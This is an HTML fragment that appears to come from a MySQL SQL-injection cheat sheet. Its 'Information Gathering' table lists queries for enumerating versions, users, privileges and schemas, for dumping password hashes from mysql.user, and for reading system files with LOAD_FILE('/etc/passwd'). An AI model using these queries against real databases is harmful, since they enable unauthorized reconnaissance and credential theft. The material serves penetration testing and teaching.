mysql.html

<h3 id="information-gathering">Information Gathering</h3>


<p class="pageDescription">{{site.data.injectionDescriptions.informationGathering}}</p>

<p>* Requires privileged user</p>
<table class="table table-striped table-hover">
  <thead>
    <tr>
      <th>Description</th>
      <th align="left">Query</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Version</td>
      <td>SELECT @@version</td>
    </tr>
    <tr>
      <td>User</td>
      <td>SELECT user()<br/>SELECT system_user()</td>
    </tr>
    <tr>
      <td>Users</td>
      <td>SELECT user FROM mysql.user<br/>* SELECT Super_priv FROM mysql.user WHERE user= 'root' LIMIT 1,1</td>
    </tr>
    <tr>
      <td>Tables</td>
      <td>SELECT table_schema, table_name FROM information_schema.tables</td>
    </tr>
    <tr>
      <td>Columns</td>
      <td>SELECT table_name, column_name FROM information_schema.columns</td>
    </tr>
    <tr>
      <td>Databases</td>
      <td>SELECT schema_name FROM information_schema.schemata<br></td>
    </tr>
    <tr>
      <td>Current Database Name</td>
      <td>SELECT database()</td>
    </tr>
    <tr>
      <td>Query another Database</td>
      <td>USE [database_name]; SELECT database();<br/>SELECT [column] FROM [database_name].[table_name]</td>
    </tr>
    <tr>
      <td>Number of Columns</td>
      <td>SELECT count(*) FROM information_schema.columns WHERE table_name = '[table_name]'</td>
    </tr>
    <tr>
      <td>DBA Accounts</td>
      <td>SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'</td>
    </tr>
    <tr>
      <td>Password Hashes</td>
      <td>SELECT host, user, password FROM mysql.user -- (until MySQL 5.6)<br/>SELECT host, user, authentication_string FROM mysql.user -- (since MySQL 5.7)</td>
    </tr>
    <tr>
      <td>Schema</td>
      <td>SELECT schema()</td>
    </tr>
    <tr>
      <td>Path to Data</td>
      <td>SELECT @@datadir</td>
    </tr>
    <tr>
      <td>Read Files</td>
      <td>* SELECT LOAD_FILE('/etc/passwd')</td>
    </tr>
  </tbody>
</table>